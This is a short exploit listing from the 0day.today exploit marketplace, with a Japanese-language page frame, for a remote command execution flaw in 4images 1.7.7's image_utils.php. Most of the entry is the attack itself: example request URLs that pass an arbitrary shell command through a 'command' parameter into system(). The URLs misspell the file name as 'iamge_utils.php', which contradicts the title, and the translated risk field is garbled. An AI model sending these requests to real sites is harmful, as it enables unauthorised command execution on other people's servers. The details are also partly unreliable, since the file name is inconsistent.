[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
0day.today  Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

4images <= 1.7.7 (image_utils.php) Remote Command Execution

著者
n/a
リスク
[
セキュリティリスクは,被保険者
]
0day-ID
0day-ID-12218
カテゴリ
web applications
日付の追加
12-05-2010
プラットフォーム
php
=========================================================================
4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability
=========================================================================


# [+] Script :4images #
# [+] Download:http://www.4homepages.de/downloads/e0adbeb40435/4images1.7.7.zip
# Version: [1.7.7] #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : includes/image_utils.php
 
http://localhost/includes/iamge_utils.php?command=[your command]
 
http://127.0.0.1/includes/iamge_utils.php?command=[your command]
 
 
 system($command);
 
line : 104 and 125 



#  0day.today [2024-06-30]  #